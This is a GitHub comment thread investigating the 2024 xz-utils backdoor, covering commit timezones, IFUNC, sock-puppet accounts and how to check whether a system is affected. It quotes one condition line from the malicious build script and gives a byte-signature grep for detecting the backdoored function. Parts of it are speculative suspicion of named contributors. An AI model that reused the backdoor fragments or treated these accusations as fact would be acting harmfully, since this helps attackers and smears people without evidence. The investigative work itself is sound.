GitHub has just restored access to his account. There may be many more repositories where malicious code can be found - e.g. llvm compiler llvm/llvm-project#63957

Perfect, now they can return back to doing their part as a little “helper elf”. Lol, perhaps a very subtle cue to what they had on their mind.

Just trying to do my part as a helper elf!

Jia Tan

https://www.mail-archive.com/xz-devel@tukaani.org/msg00518.html

@wtznc

wtznc commented Mar 31, 2024

This situation made me wonder how many other such libraries are developed by (mostly) one person and end up in most Linux distributions, but the author is not actively involved in their development. This is a potential vector for further attacks. I am very curious about the social aspect - how this relationship and trust was built between the authors.

@Fearyncess

Fearyncess commented Mar 31, 2024

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

Thank you.

@Z-nonymous I'm not sure what your point is there... xry111 just misunderstood whatever the OpenSSL procedure is. t8m and slontis are both well-known, longstanding members of the OpenSSL team.

Just asking if they really reviewed. for side effects

I don't say they submit faulty code _they might be sometimes on good faith wrongly approving stuff from a bad actor that ends up having side effects. that's why I noted the pure issue. They maybe really want to push Loongson arch support and are played.

xry111 and xen0n are both maintainers of some of the loong ports in the kernel/toolchain and I'm not surprised they show up to review other changes to core packages where the changes are specific to loong...

I'm making correlations, asking advice. i.e. liblzma_la-crc64-fast.o is the backdoor as per https://gynvael.coldwind.pl/?id=782 xry111 was also commit code for LoongArch for CRC code in xv approved by JiaT75 in tukaani-project/xz#86

, loong isn't exactly a big target.

Well, I need to further investigate, there has been reviews from them in many code/functions modules that are in the analysis from thread in https://www.openwall.com/lists/oss-security/2024/03/29/4 that have been modified for LoongArch in some form The breath of area they are contributing (comments, reviews, approvals, PRs) in that team is everywhere, Compilation, system services, ssl, crypto, kernel, localization, html, assembly, c, rust, node, nvm, dosbox,

They can't potentially know every possible implications of updates in such a large code base.

Again: I don't say they submit faulty code _they might be sometimes on good faith wrongly approving stuff from a bad actor that ends up having side effect they don't apprehend. I will review make-ca but maybe there are places

In any case, to me, this looks a bit like a witch-hunt against two people who are Chinese.

Do you know these people IRL ? Do you know the people they approve the PRs of ? How do you know any GH user is Chinese ? Only real police/federal/interpol investigation can determine that. Even then sometimes they could arrest someone who happened to have found a usb key in Latvia instead of a Russian agent.

I've worked with many Chinese colleagues in research & engineering; they are as brilliant minds as anyone. I never implied anything Chinese-related; maybe my fault was trying to explain that Loongson is a Chinese CPU manufacturer for context. I never even said they were actually from that company. I just assumed they implement support for it.

They might be played by people complaining about bad Loongson support, providing engineered reports, forcing them to make changes whose side effects they don't always understand.

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

Thank you.

By your words, a "25-year Unix commercial TALENT" smells in this thread like a JiaT75's partner, even himself. Because you are spreading misinformation and trying to slander the other person, that also can be a part of THIS APT. Don't you think so?

@Carnildo

If instead of obfuscated code, imagine if the attacker did things a little smarter? Like perhaps an "accidental" buffer overflow (or other memory based exploit)...

Truly accidental buffer overflows are so common that most systems have protections against them. The days of simply dropping shellcode on the stack are long gone.

@x1done

x1done commented Mar 31, 2024

I am not familiar with coding, but on 2024-02-12, the commit timestamps (and timezones) of 'jiat0218' were exactly the same as those of Lasse Collin. Is it expected?

commit e0c0ee475c0800c08291ae45e0d66aa00d5ce604
Author: Lasse Collin <lasse.collin@tukaani.org>
Date:   2024-02-12 17:09:10 +0200

...

commit de5c5e417645ad8906ef914bc059d08c1462fc29
Author: Jia Tan <jiat0218@gmail.com>
Date:   2024-02-12 17:09:10 +0200

...

commit e446ab7a18abfde18f8d1cf02a914df72b1370e3
Author: Jia Tan <jiat0218@gmail.com>
Date:   2024-02-12 17:09:10 +0200

...

commit 7f6d9ca329ff3e01d4b0be7366eb4f5c93da41b9
Author: Lasse Collin <lasse.collin@tukaani.org>
Date:   2024-02-12 17:09:10 +0200

https://raw.githubusercontent.com/freebsd/freebsd-src/ee36e7faceafeef05c5e81654a1d8ec11d314894/contrib/xz/ChangeLog

@ItzSwirlz

Probably modifying and tampering with git commits manually

@thesamesam
Author

Just keep in mind that this is kind of normal when applying someone else's commits via rebase or git am, especially if patches got emailed or similar. Not saying that is what happened here but it's not super abnormal either.

@crrodriguez

IFUNC was added to enable this attack. Is IFUNC actually useful for anything legitimate? I know the attacker convinced glibc that it was, but... it's glibc, they love useless features that complicate everything.

Edit: and in particular, does IFUNC have the potential to reduce security by design?

ifunc is a GNU extension to ELF that glibc uses to select target-specific optimizations at load time, picking the fastest routine for your hardware for basic functions such as memcpy and the math routines. This all comes from a single library, rather than dozens or hundreds of different builds to target all user hardware.
Some basic explanation here: https://jasoncc.github.io/gnu_gcc_glibc/gnu-ifunc.html
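For readers who have not met the pattern before, here is a loose analogy in Python. It is not how ELF ifunc is implemented; it only mirrors the shape of it: a resolver runs once, inspects the hardware, and the chosen implementation is bound to the public name. The feature flag `pclmul` and all function names are picked purely for illustration.

```python
import zlib
from typing import Callable


def crc_generic(data: bytes) -> int:
    """Portable bitwise CRC-32, standing in for the baseline routine."""
    crc = 0xFFFFFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ (0xEDB88320 if crc & 1 else 0)
    return crc ^ 0xFFFFFFFF


def crc_accelerated(data: bytes) -> int:
    """Stand-in for a CPU-specific routine; here it simply calls zlib."""
    return zlib.crc32(data)


def resolve_crc(cpu_features: set[str]) -> Callable[[bytes], int]:
    """Resolver: runs once and returns the implementation to bind."""
    # "pclmul" is a hypothetical feature flag used only for this sketch.
    return crc_accelerated if "pclmul" in cpu_features else crc_generic


# Bound once; every later call goes straight to the selected routine.
crc32 = resolve_crc({"sse2", "pclmul"})
print(crc32(b"123456789") == crc_generic(b"123456789"))  # True
```

The security-relevant part is the resolver: with real ifunc it is code from the library that runs while the dynamic loader is still setting the process up, which is why a legitimate-looking optimization made a convenient pretext here.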

@thesamesam
Author

IFUNC was probably not worth using here and Lasse wasn't really in love with it as he felt it was a lot of complexity, but it isn't useless or anything in general either. But I must admit I did not say it should be removed or anything like that.

@w-flo

w-flo commented Apr 1, 2024

commit timestamps (and timezones) of 'jiat0218' were exactly the same as those of Lasse Collin

Looking at the repo, e.g. here, all 4 commits were committed by Lasse Collin at the same time on Feb 14. He probably received 2 of these commits from Jia Tan (maybe through a pull request) and reset the date for all 4 commits, maybe after rebasing to solve merge conflicts, two days before committing them all at the same time. I'd say that's not suspicious.

@x1done

x1done commented Apr 1, 2024

@thesamesam Is this a known issue, and can it be reproduced? Given that the timestamps (and timezones) are exactly the same, the only explanation is that they were triggered by the same person. Since it occurred in February 2024, just a few days before the backdoor was installed, it is probably worth being alerted.

In almost all commit logs, Jia Tan uses the +800 timezone, except for the one above and the following one:

commit 86118ea320f867e09e98a8682cc08cbbdfd640e2
Author: Jia Tan <jiat0218@gmail.com>
Date:   2023-06-27 23:38:32 +0800					--> +800	Jia Tan		2023-06-27 23:38:32 +0800 (18:38:32 +0300)

    Update THANKS.

 THANKS | 1 +
 1 file changed, 1 insertion(+)

commit 3d1fdddf92321b516d55651888b9c669e254634e
Author: Jia Tan <jiat0218@gmail.com>
Date:   2023-06-27 17:27:09 +0300					--> +300	Jia Tan		2023-06-27 17:27:09 +0300

    Docs: Document the configure option --disable-ifunc in INSTALL.

 INSTALL | 8 ++++++++
 1 file changed, 8 insertions(+)

commit b4cf7a2822e8d30eb2b12a1a07fd04383b10ade3
Author: Lasse Collin <lasse.collin@tukaani.org>
Date:   2023-06-27 17:24:49 +0300					--> +300	Lasse Collin	2023-06-27 17:24:49 +0300

He switched between the +300 and +800 timezones?

Note that in this case, the timestamps were not the same, so they were unlikely triggered by the same command or commit.
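When comparing timestamps recorded with different UTC offsets, it helps to normalize them first. A small sketch using only the dates quoted above; the helper names are made up for illustration, and the format string assumes the `YYYY-MM-DD HH:MM:SS +ZZZZ` layout shown in the ChangeLog.

```python
from datetime import datetime

GIT_ISO = "%Y-%m-%d %H:%M:%S %z"


def parse(stamp: str) -> datetime:
    """Parse a 'YYYY-MM-DD HH:MM:SS +ZZZZ' timestamp into an aware datetime."""
    return datetime.strptime(stamp, GIT_ISO)


def same_instant(a: str, b: str) -> bool:
    """True if both stamps denote the same moment, whatever their offsets."""
    return parse(a) == parse(b)


def shown_in_zone(stamp: str, reference: str) -> str:
    """Re-express stamp using the UTC offset of reference."""
    return parse(stamp).astimezone(parse(reference).tzinfo).strftime(GIT_ISO)


print(shown_in_zone("2023-06-27 23:38:32 +0800", "2023-06-27 17:27:09 +0300"))
# 2023-06-27 18:38:32 +0300
```

The offset stored in a commit only reflects the clock settings of whichever machine created that timestamp, so on its own it says little about who the person was or where they were.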

@AdrianBunk

@thesamesam
https://bugs.debian.org/1067708
https://git.tukaani.org/?p=xz.git;a=commit;h=ee44863ae88e377a5df10db007ba9bfadde3d314

"Hans Jansen" seems to be another alias of "Jia Tan" (or the alias of a different member of the attacker team).

@xry111

xry111 commented Apr 1, 2024

If you apply a patch sent to you from another person (or maybe not a person, whatever) with patch -Np1 then git commit --author=..., the timestamp (including time zone) will be your own.

I'd always use git am instead, but AFAIK some people do not. (Edit: and git am is somehow more strict than patch -Np1, so if git am fails but patch -Np1 works people may just commit it with git commit --author=... after visually inspecting the change anyway.)

@thesamesam
Author

@x1done b4cf7a2822e8d30eb2b12a1a07fd04383b10ade3 looks OK to me in terms of content. I have a clone from a fair while ago and I don't think any force pushes occurred.

I suspect Lasse applied those and just ended up mangling the timestamps (others have mentioned some scenarios about how it could happen with git am), but it might be worth asking him (once the important stuff is dealt with). Not everyone is super comfortable with git branches so it might be that he exported his own changes and reapplied them later, or similar.

@thesamesam
Author

thesamesam commented Apr 1, 2024

@AdrianBunk Thanks. I will reflect on if this should be included. It's hard because I do not want to encourage a witch hunt and it's mentioned in some references I included. If you have a suggestion for how I could include it without it sounding accusatory, then that would be helpful.

EDIT: Maybe I could mention it in the context of when the IFUNC stuff got introduced.

@AdrianBunk

Is this a known issue, and can it be reproduced? Given that the timestamps (and timezones) are exactly the same, the only explanation is that they were triggered by the same person.

@x1done Some batch action was done by the same person (Lasse).

You can reproduce the effect in many ways, for example with:

git format-patch -2
git reset --hard HEAD^^
git am --ignore-date 000*

From looking at the (untampered) autoconf code I got the impression that Lasse is (like me) someone who was already developing software in the 1990s, many years before git was written. People who started coding before git existed often have some pre-git habits in their workflows since you usually don't change everything when starting to use a new tool, it wouldn't shock me if what happened for example included such an export to patches and then re-import to git.

@thesamesam
Author

@AdrianBunk This matches my understanding on all parts.

@x1done

x1done commented Apr 1, 2024

@thesamesam To be honest, here I'm not really interested in what was committed, but rather in the timezone and timestamps, especially the following one:

commit 3d1fdddf92321b516d55651888b9c669e254634e
Author: Jia Tan <jiat0218@gmail.com>
Date:   2023-06-27 17:27:09 +0300    --> +300    Jia Tan    2023-06-27 17:27:09 +0300

    Docs: Document the configure option --disable-ifunc in INSTALL.

 INSTALL | 8 ++++++++
 1 file changed, 8 insertions(+)

I don't think it was a commit triggered from account 'Lasse Collin', as there were no other events at the same timestamp. In that case, it should be from account Jia Tan itself. This raises the question, why did Jia Tan change his timezone to +300?

@thesamesam
Author

thesamesam commented Apr 1, 2024

@x1done But doesn't this match Lasse's TZ (for half the year or w/e)? The point being it looks like Lasse pushed it (author vs committer). It's been covered how the time might change to Lasse's when applying a patch from someone else.

EDIT: xry111 rightly points out in https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27?permalink_comment_id=5007558#gistcomment-5007558 that the pusher may be a third person and this isn't represented in git metadata.

@ItzSwirlz

@x1done daylight savings?

@xry111

xry111 commented Apr 1, 2024

@x1done But doesn't this match Lasse's TZ (for half the year or w/e)? The point being it looks like Lasse pushed it (author vs committer).

Both the author and the committer are Jia Tan:

$ git show 3d1fdddf92321b516d55651888b9c669e254634e --format=fuller | head
commit 3d1fdddf92321b516d55651888b9c669e254634e
Author:     Jia Tan <jiat0218@gmail.com>
AuthorDate: Tue Jun 27 17:27:09 2023 +0300
Commit:     Jia Tan <jiat0218@gmail.com>
CommitDate: Tue Jun 27 23:56:06 2023 +0800

    Docs: Document the configure option --disable-ifunc in INSTALL.

diff --git a/INSTALL b/INSTALL
index 7fb41fa6..b64c56c5 100644

But the person who pushed this commit need not be either the author or the committer. (I.e. it may happen that A authored the change, B committed the change, and C pushed the change.)

It's not possible to find the person who pushed the commit with the git CLI. AFAIK there is some GitHub API to figure out when and by whom a commit was pushed. However, the repo is under suspension, and even if it weren't, I still don't know if this approach would work when the GitHub repo is only a mirror.

@thesamesam
Author

thesamesam commented Apr 1, 2024

Yes, you're absolutely right. The person who pushed it may be a third person which isn't represented in the commit metadata.

EDIT: I will edit my earlier comment and link to that.

@x1done

x1done commented Apr 1, 2024

@ItzSwirlz I can't think of any of the +0800 countries, such as CN/SG/MY, that use daylight saving time, and even then it couldn't be +0300.

@thesamesam In the scenario (as xry111 has explained) on 2024-02-12, I guess there should be multiple events from both accounts at the same time. However, with this one, there is only a single event at that time.

@AdrianBunk

@x1done

@ItzSwirlz I can not think of any of the +800 countries, such as CN/SG/MY, use daylight saving time, and it can't be +300.

Lasse is living in Finland (like me).
+0300 is Finnish summer time.

It is obvious that it was Lasse who applied these patches/commits, including ones that were written by the attacker.

@AdrianBunk

AdrianBunk commented Apr 1, 2024

@AdrianBunk Thanks. I will reflect on if this should be included. It's hard because I do not want to encourage a witch hunt and it's mentioned in some references I included. If you have a suggestion for how I could include it without it sounding accusatory, then that would be helpful.

EDIT: Maybe I could mention it in the context of when the IFUNC stuff got introduced.

@thesamesam

https://github.com/hansjans162
Some token activity elsewhere around the xz pull request, and then never seen again.

In Debian, nearly 2 years later, there was not only this one (and only) bug report requesting the upgrade to 5.6.1: a few days earlier this "person" also created a (now blocked) new user on the Debian git that showed the same pattern of some token activity in other projects while also pushing the upgrade to 5.6.1 right after creating the account:
https://web.archive.org/web/20240330080632/https://salsa.debian.org/hjansen
https://salsa.debian.org/debian/xz-utils/-/merge_requests/1

Can you find any other traces of this "person"?

(EDIT: restored after mistakenly "Update comment" instead of a new comment for my next one)

@thesamesam
Author

thesamesam commented Apr 1, 2024

@AdrianBunk The only thing I've seen pointed out is https://marc.info/?w=2&r=1&s=hans+jensen&q=a but when I took a brief look, it looked like they were not the same person. I will of course keep an eye out...

EDIT: Note that xz-devel is not currently on marc, but I believe the marc people want to get it imported. I should also say questions are welcome - feel free to keep throwing them. I can't reply to every single one, especially if they're more.. out there, but yours have been totally fine & worth answering.

@gh-markt

gh-markt commented Apr 1, 2024

Has anyone documented how this exploit may be done without systemd?

@thesamesam
Author

thesamesam commented Apr 1, 2024

@gh-markt I'm going to update the gist on this today, but TL;DR: all suggested paths I've seen wouldn't work AFAIK because they rely on PAM modules which load too late.

(Of course, if the payload were different, that would be another story, but talking about what we have.)

@AdrianBunk

Immediately after 5.6.1 landed in Debian unstable thanks to the pushing by "Hans Jansen", "Jia Tan" requested a freeze exception in Ubuntu so that it would get into the upcoming LTS (due to be released later this month):
https://tracker.debian.org/news/1515323/accepted-xz-utils-561-1-source-into-unstable/
https://bugs.launchpad.net/ubuntu/+source/xz-utils/+bug/2059417

@makotom

makotom commented Apr 1, 2024

In case this is of any help: https://twitter.com/m61k/status/1774614747553620478
tl;dr - I didn't see the if clause (pasting it below for convenience) as a clue that it targets only glibc-based systems on AMD64, unlike the explanation in the Design section.

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

Apologies if it's a false alarm!

@Artoria2e5

Artoria2e5 commented Apr 1, 2024

@makotom Hm. Indeed. The build variable is extracted through eval $(grep ^build=\'x86_64 config.status) (backticks replaced with $(), because i can't markdown), so we should ask autoconf about it.

In autoconf, build is what the --build option eventually gets set to (check general.m4, there's a bit that says build=$build_alias later). The --build option is "the machine you are building on", defaulting to whatever config.guess finds.


now the if line. let's replace the grep with just (true) and (false), so we can find that the expression is the same as

if (! (something ^x86_64)) && (something linux-gnu$); then

There is an illusion of choice here: recall that grep ^build=\'x86_64 config.status above means if build is ever set, it has to start with x86_64. so we have three possibilities:

  1. build is not set, because build machine is not x86_64. both parts are false, so true && false is false... no exit.
  2. build is x86_64somethinglinux-gnu. first part is true, second part is true. with negation, we get false && true... no exit.
  3. build is x86_64, but does not end with linux-gnu. first true, second false, exit.

... what? none of this makes sense. Considering the bad version of the crc code is supposed to be only x86_64, we should have seen loads of issues when people compile on a non-x64 machine. or when they cross compile. Maybe something else down the line prevents the wrong-architecture object from being linked?
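One way to sanity-check the case analysis above is to run the quoted condition against a few sample values of build. This is only a sketch: `check_build` is a hypothetical helper, the triplets are made-up examples, and it assumes (following the wording above) that the body of the `if` is an exit. The shell parses `! (A) && (B)` as `(! A) && B`, so the negation applies to the first grep only.

```shell
#!/bin/sh
# Evaluate the quoted condition for a given (hypothetical) build triplet.
# Prints "exit" when the `if` body would run, "no exit" otherwise.
check_build() {
    build=$1
    if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1); then
        echo "exit"
    else
        echo "no exit"
    fi
}

# Sample values: unset, x86_64 + glibc, x86_64 + musl, non-x86_64 + glibc.
for triplet in "" x86_64-pc-linux-gnu x86_64-pc-linux-musl aarch64-unknown-linux-gnu; do
    printf '%-28s %s\n' "${triplet:-<unset>}" "$(check_build "$triplet")"
done
```

With these samples, only the non-x86_64 triplet ending in linux-gnu takes the branch, and that is the case the `grep ^build=\'x86_64` step is argued to rule out. The x86_64 triplet that does not end in linux-gnu comes out as "no exit", which is worth comparing against case 3 in the list.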


Yikes, we have two scripts in one, the top-level if and the elif. The if is the part that does things to the Makefile, the elif is the part that does stuff to objects.

Maybe the $CC invocation will detect the architecture mismatch, and 2>/dev/null successfully handles it, so there's no issue with cross compile? (Would still go bonkers at runtime for when host is either (x64 && glibc) or (non-x64), target is (x64 && !glibc), but that's probably too rare.)

I don't know.

@x1done

x1done commented Apr 1, 2024

@x1done

@ItzSwirlz I can not think of any of the +800 countries, such as CN/SG/MY, use daylight saving time, and it can't be +300.

Lasse is living in Finland (like me). +0300 is Finnish summer time.

It is obvious that it was Lasse who applied these patches/commit, including ones that were written by the attacker.

@AdrianBunk Sorry, as mentioned I am not familiar with coding, so I might be wrong. And I don't want to spam the thread. However, I believe we shouldn't ignore anything "suspicious" as it might lead us to what had happened, unless we can reproduce it or are confident enough to rule out its suspicious nature.

It is obvious that it was Lasse who applied these patches/commit, including ones that were written by the attacker. --> Are we confident your theory can explain the following? "Jia Tan" authored with a +0300 timezone and "Jia Tan" committed with a +0800 timezone? Note - it was committed by account "Jia Tan" with +0800 timezone, not Lasse with +300 timezone.

commit 3d1fdddf92321b516d55651888b9c669e254634e
Author:     Jia Tan <jiat0218@gmail.com>
AuthorDate: Tue Jun 27 17:27:09 2023 +0300
Commit:     Jia Tan <jiat0218@gmail.com>
CommitDate: Tue Jun 27 23:56:06 2023 +0800

@viccie30

viccie30 commented Apr 1, 2024

Lennart Poettering's remarks about libselinux linking liblzma are apparently true, but that dependency is apparently an error: https://www.openwall.com/lists/oss-security/2024/03/31/12

@thesamesam
Author

thesamesam commented Apr 1, 2024

@viccie30 Someone else has just pointed this out to me - thanks to both of you. I'll update things shortly.

Really pleased to have this clarification, as it made little sense to me until now, as I couldn't find a trace of liblzma/xz in libselinux (I only grepped the latest tarball & used gh search though, didn't go so far as cloning their repo and grepping history). It was on my list to look into.

@viccie30

viccie30 commented Apr 1, 2024

@x1done

@ItzSwirlz I can not think of any of the +800 countries, such as CN/SG/MY, use daylight saving time, and it can't be +300.

Lasse is living in Finland (like me). +0300 is Finnish summer time.
It is obvious that it was Lasse who applied these patches/commit, including ones that were written by the attacker.

@AdrianBunk Sorry, as mentioned I am not familiar with coding, so I might be wrong. And I don't want to spam the thread. However, I believe we shouldn't ignore anything "suspicious" as it might lead us to what had happened, unless we can reproduce it or are confident enough to rule out its suspicious nature.

It is obvious that it was Lasse who applied these patches/commit, including ones that were written by the attacker. --> Are we confident your theory can explain the following? "Jia Tan" authored with a +0300 timezone and "Jia Tan" committed with a +0800 timezone? Note - it was commited by account "Jia Tan" with +0800 timezone, not Lasse with +300 timezone.

commit 3d1fdddf92321b516d55651888b9c669e254634e
Author:     Jia Tan <jiat0218@gmail.com>
AuthorDate: Tue Jun 27 17:27:09 2023 +0300
Commit:     Jia Tan <jiat0218@gmail.com>
CommitDate: Tue Jun 27 23:56:06 2023 +0800

Anyone can put whatever name, date, or message they want in a commit. I can push a commit made 2 years in the future in a different timezone authored by Henry Kissinger and committed 3 years ago by Pol Pot if I want to.
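A minimal sketch of that point, in a throwaway repo: git takes the identities and dates from the environment of whoever runs the command and records them as given. The names, addresses and dates below are placeholders picked for illustration.

```shell
#!/bin/sh
# Sketch: commit metadata is whatever the client supplies.
# All identities and dates here are made-up placeholders.
repo=$(mktemp -d)
git init -q "$repo"
echo 'demo' > "$repo/file.txt"
git -C "$repo" add file.txt

# Author dated in the future at -0500, committer dated in the past at +0900.
GIT_AUTHOR_NAME='Future Author' GIT_AUTHOR_EMAIL='future@example.org' \
GIT_AUTHOR_DATE='2030-01-01 12:00:00 -0500' \
GIT_COMMITTER_NAME='Past Committer' GIT_COMMITTER_EMAIL='past@example.org' \
GIT_COMMITTER_DATE='2001-01-01 00:00:00 +0900' \
    git -C "$repo" commit -q -m 'metadata is whatever the client says it is'

# Show author name/date and committer name/date as stored in the commit.
forged=$(git -C "$repo" log -1 --format='%an|%ai|%cn|%ci')
echo "$forged"
```

Nothing in the commit object records who pushed it or from where, so timestamps and offsets on their own are weak evidence either way.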

@AdrianBunk

@x1done

@ItzSwirlz I can not think of any of the +800 countries, such as CN/SG/MY, use daylight saving time, and it can't be +300.

Lasse is living in Finland (like me). +0300 is Finnish summer time.
It is obvious that it was Lasse who applied these patches/commit, including ones that were written by the attacker.

@AdrianBunk Sorry, as mentioned I am not familiar with coding, so I might be wrong. And I don't want to spam the thread. However, I believe we shouldn't ignore anything "suspicious" as it might lead us to what had happened, unless we can reproduce it or are confident enough to rule out its suspicious nature.

@x1done Everyone in this discussion except you agrees that this is not suspicious, why are you wasting everyone's time by spamming this thread with repeating the same again and again and again and again?

@x1done

x1done commented Apr 1, 2024

Anyone can put whatever name, date, or message they want in a commit. I can push a commit made 2 years in the future in a different timezone authored by Henry Kissinger and committed 3 years ago by Pol Pot if I want to.

@viccie30 good, technically one can. But then what's the point of Jia Tan deliberately changing his timezone to +300 before his commit? It doesn't make sense to me, especially considering that he was using +800 most of the time.

@AdrianBunk

@viccie30 good, technically one can. but then what's the point Jia Tan deliberately changing his timezone to +300 before his commit? It doesn't make sense to me, especially considering that he was using +800 most of the time.

@x1done This has already been explained to you multiple times.

Everyone else in this thread would really appreciate if you could just shut up.

@cwegener

cwegener commented Apr 1, 2024 via email

@redcode

redcode commented Apr 1, 2024

The AuthorDate is supposed to be the original date the commit was created, which is usually equal to CommitDate unless you do an amend, force push or rebase, right? So, if the weird timezone was in CommitDate we could conclude that one of those things has happened. The problem is that the one with the suspicious timezone is AuthorDate, that is, the original one, the one that supposedly reflects when Jia Tan created the commit. Am I wrong?

@redcode

redcode commented Apr 1, 2024

It looks suspicious to me at the very least. It looks like evidence that Jia Tan was actually located at a +3 zone, not +8, and that he created that commit with his real timezone (maybe he forgot to use --date to alter the date, or maybe he used another computer or user account where he would have the correct timezone). Something might have happened with that commit, and he tried to fix it, this time using the fake time zone.

@AdrianBunk

@redcode Please stop trying to restart discussing a topic that has already been discussed far too long.

Please read https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27?permalink_comment_id=5007548#gistcomment-5007548 and other posts in this thread that explain why this is not suspicious.

@duracell

duracell commented Apr 1, 2024

It looks suspicious to me at the very least.

Or it's the thing others already posted. Which is much more likely, because it's exactly what happens if you do rebase or other things, which fits perfectly in the complete process. So if there is no evidence for anything, why would you bring this up? (It's a rhetorical question, please do NOT answer!)

@redcode

redcode commented Apr 1, 2024

@redcode Please stop trying to restart discussing a topic that has already been discussed far too long.

Please read https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27?permalink_comment_id=5007548#gistcomment-5007548 and other posts in this thread that explain why this is not suspicious.

Have you tried what you have posted? because --ignore-date should fake AuthorDate by setting it to CommitDate. Or at least that's what the documentation says.

And why this insistence on not taking into account this issue? It seems completely normal to me that a hacker would try to fake the time zone. BTW, I am NOT accusing Lasse Collin of being Jia Tan.

@AdrianBunk

Have you tried what you have posted?

Yes.

Feel free to try yourself, but please stop posting.

@redcode

redcode commented Apr 1, 2024

Have you tried what you have posted?

Yes.

Feel free to try yourself, but please stop posting.

OK, I've done it, using 2 machines. The 1st one with GMT+0, and the 2nd one with GMT+2, where I've applied the patches with git am. And, as the documentation says, AuthorDate has been replaced by CommitDate:

[image]

@tiaotiao97

Hi, I want to test whether the checking script works. I downloaded the backdoored version on CentOS 8, then ran "./autogen.sh", "./configure", "make", and "make install" step by step, and found "liblzma.so.5.6.0" in /usr/local/lib/. Then I executed <hexdump -ve '1/1 "%.2x"' /usr/local/lib/liblzma.so.5.6.0 | grep f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410>. But it doesn't work: I cannot find this function signature in the .so file. What's the problem? Thanks.

@Leseratte10

The backdoor is only applied when building DEB or RPM packages, it's not applied when building locally / without packaging.

@jmakovicka

Also, autogen will likely overwrite the backdoored files with clean versions. You need to run configure only.

@zacanger

zacanger commented Apr 1, 2024

@redcode I don't think anyone's trying to be dismissive of something that's worthwhile. I'm sure people do fake their timezones, but there are so many possibilities for how that would happen that this doesn't seem like a useful path to go down (like using git-am, except for once, or trying Codespaces in Firefox with resistfingerprinting on, or travelling, or using a spare computer set to a different timezone, or all kinds of things).

If you (or anyone else) is interested in exploring that, no one's forcing you not to, just please don't keep posting about it unless you find something genuinely useful. This thread probably has a lot of followers now, and many are getting emails for every comment posted. It's a lot of noise about something that doesn't seem to be all that useful.

@tiaotiao97

The backdoor is only applied when building DEB or RPM packages, it's not applied when building locally / without packaging.

Thank you. Can the rpmbuild tool be used for this case?

@tiaotiao97

Also, autogen will likely overwrite the backdoored files with clean versions. You need to run configure only.

Hello, I can't find a configure script in the source code😂, so I generated it with autogen. How can I run configure directly?

@thesamesam
Author

The malicious version of the macro is only in the release tarball. If you see no configure script, it's not a release tarball, and the bad macro wasn't there to begin with.

@tiaotiao97

The malicious version of the macro is only in the release tarball. If you see no configure script, it's not a release tarball, and the bad macro wasn't there to begin with.

I'll try again. Thank u :)

@thesamesam
Author

I'm slowly building up a git repo with all the release tarballs but I keep getting distracted. I'll add it to the gist when it's done.

@flyingcakes85

Have we heard anything from Jia Tan after the backdoor was discovered? From what I gather, he was reasonably active and conversing with maintainers of distribution packagers. Has he not emailed any maintainer or used IRC after 29 March?

@thesamesam
Author

@flyingcakes85 AFAIK no. But Lasse did mention since this started that he also wasn't expecting to hear anything as both of them had planned to be offline over easter.

@thesamesam
Author

thesamesam commented Apr 1, 2024

@lazka

lazka commented Apr 1, 2024

The 5.6.0 tarball (not the case with 5.6.1) has various files, such as the test files and some binary test files, with updated mtimes right before autogen.sh was called, which seems like it might have been by mistake. Maybe something to look into.

And the tarball was likely created with Arch Linux, since Arch ships a git version of libtool, and that matches: 2.4.7.4-1ec8f-dirty. In case someone wants to re-create the tarball from git for comparison.

@WaaromZoMoeilijk

WaaromZoMoeilijk commented Apr 1, 2024

Can someone help me understand what we ought to do with liblzma, as opposed to downgrading xz-utils itself?
It seems my script will downgrade xz-utils just fine but liblzma stays on the current distro version. I would love some input on this, as I'm quite sure we'd need to downgrade this one as well, but I'm not really sure to which version.

https://github.com/WaaromZoMoeilijk/Security/blob/main/CVE-2024-3094.sh

@erinacio

erinacio commented Apr 1, 2024

Can someone help me understand what we ought to do with liblzma opposed to downgrading xz-utils itself? It seems my script will downgrade xz-utils just fine but liblzma stays on current distro version, would love some input on this as I'm quite sure we'd need to downgrade this one as well but I'm not really sure to which version.

https://github.com/WaaromZoMoeilijk/Security/blob/main/CVE-2024-3094.sh

The actual backdoor payload is in liblzma. When it's dynamically linked into /usr/sbin/sshd (through an indirect dependency introduced by libsystemd, and with some specific preconditions checked inside the payload), it will intercept some libcrypto functions (libcrypto being a direct dependency of sshd).
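To see which liblzma file your own sshd would actually load, something like the sketch below may help. `liblzma_path_from_ldd` is a hypothetical helper name, and the sketch assumes the usual glibc `ldd` output format (`name => /path (address)`). It only reports the library path; it does not tell you whether that file is backdoored.

```shell
#!/bin/sh
# Pull the resolved liblzma path out of `ldd` output supplied on stdin.
# Expects lines shaped like: "liblzma.so.5 => /path/to/liblzma.so.5 (0x...)".
liblzma_path_from_ldd() {
    awk '/liblzma/ && $3 ~ /^\// { print $3; exit }'
}

sshd_bin=$(command -v sshd 2>/dev/null)
if [ -z "$sshd_bin" ]; then
    echo "sshd not found in PATH"
else
    lzma=$(ldd "$sshd_bin" | liblzma_path_from_ldd)
    if [ -n "$lzma" ]; then
        # The symlink target often carries the full version in its file name.
        echo "sshd loads liblzma from: $(readlink -f "$lzma")"
    else
        echo "sshd does not load liblzma on this system"
    fi
fi
```

If the resolved file name ends in 5.6.0 or 5.6.1, that is the library package to downgrade, whatever name your distro gives it.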

@fungilife

thesamesam:

easter

For those pointing fingers at geography and ethnicity, need I remind them that this holiday is observed by Western Christian religions/geographies (Catholics, Protestants, etc.), not Eastern ones (from Siberia to East Africa), nor by Hindus, Buddhists, Jews, or Muslims.
Orthodox Easter holidays are in late April.

I have been a long term fan of xz and hate to bash it even more, but the possibility of the two contributors being one and the same appears to have escaped nearly everyone here.
Tarballs have been signed by this "entity" as versions pretty far back, further than some people seem to perceive as "safe" versions.

I apologize if some of you feel this observation is useless.

@marco-silva0000

